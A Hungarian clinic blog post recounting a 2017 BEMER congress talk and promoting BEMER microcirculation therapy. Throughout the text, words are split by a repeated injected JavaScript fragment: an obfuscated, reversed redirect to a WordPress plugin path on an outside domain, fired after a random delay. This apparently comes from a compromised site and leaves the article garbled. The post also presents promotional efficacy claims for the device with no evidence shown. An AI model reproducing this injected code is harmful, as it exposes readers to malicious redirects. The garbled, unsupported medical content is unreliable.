2112 Veresegyház, Repkény utca 18 H-P: 7:00-22:00h / Szo-V: 9:00-18:00h +36-20/460-4106

BEMER

Második beszámoló a 2017. szeptemberi Nemzetközi BEMER Kongresszusról

Második beszámoló a 2017. szeptemberi Nemzetközi BEMER Kongresszusról

Előző bloggal elkezdtem egy összefoglalót a 2017. szeptember utoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolsó hétvégéjén tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, Nemzetközi Bemer Orvos kongresszuson elhangzottakról.

Orvosokkal és más egészségügyi szakemberekkel beszélgetve általános tapasztalat, hogy a BEMER terápiával kapcsolatban először felmerült a kérdés, hogyan valóban hatékony? Valóban azt nyújtja, amit a gyártó és képviselője állít? Közel 10 éve foglalkozom, BEMER terápiával és visszatekintve az időben, azt látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, egyre több orvosi tapasztalat van és egyre többször hallom betegektől, hogy a „kezelőorvosom ajánlotta” , a „zárójelentésben javasolta, hogy pár hónapig használjam”, lombikbébi programban, hogy „beültetés előtt pár hónapig használjam” vagy traumatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tológiai esetekben „ gyorsabb csontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosodás miatt, ajánlott a BEMER használata”. Vannak olyanok is akik csodát várnak. A készülék nem tud csodát tenni, de amit tud- és az adatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok is alátámasztják-, a mikro keringés stimulációjával az magáért beszél:

https://mediforte.hu/bemer/

Az előadáson is elhangzott, hogy a kereskedelmi forgalomban lévő eszközök összehasonlításával nagyságrendi különbség van, a BEMER és más eszközök hatása és hatékonysága között. Ha a kedves olvasóm kéri, elküldjük ezt a tanulmányt. Kérem, írjon nekünk a mediforte@mediforte.hu e-mail címre.
Prof Med. Reiner Klopp
Prof. Dr. meg Reiner Klopp tanár úr most is sziporkázott az előadás során. Mint orvos és fizikus több szemszögből is vizsgálja, a BEMER hatását a Berlini Mikrocirkulációs Intézetben. Fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos megállapításai a kis véredények keringési tulajdonságairól illetve hogy miben különbözik a nagyobb véredények keringésétől. Kitért arra is a megállapításra is, hogyan váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toztatható a keringés diffúziós útja. Egyik ilyen módszer a működő kapillárisok számának a növelésével. Miért fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos ez a megállapítás? Van egy olyan területe az érrendszerünknek, ahol a gyógyszeres terápia nem hat és ezt a területet kell valamilyen módszerrel támogatni. Összefoglalva: Ha azt a célt elérjük, hogy a jól működő kapillárisok számát jelentősen növeltük és tudunk hatni a keringésnek arra a részére, amelyre más módszerekkel (p. gyógyszer) ez nem működik, akkor a vér áramlása célba érhet, azaz a sejtek megkapják a megfelelő mennyiségű utánpótlást, amely az optimális működésükhöz kell. BEMER terápia ezt a célt eléri.
Klopp tanár úr nem nélkülözte fizikus énjét sem, hiszen az vérárammal kapcsolatban kitért még a nyírófeszültség és áramlási sebesség összefüggéseire is. Az előadás kiemelten élvezetes volt sok-sok humoros megjegyzéssel fűszerezve.

Posted Comments
  • Első beszámoló a 2017 szeptemberi Nemzetközi BEMER Kongresszusról - Otthoni Gyógyulás
    Első beszámoló a 2017 szeptemberi Nemzetközi BEMER Kongresszusról - Otthoni Gyógyulás
    […] 2.rész […]
    válasz

Comments are closed.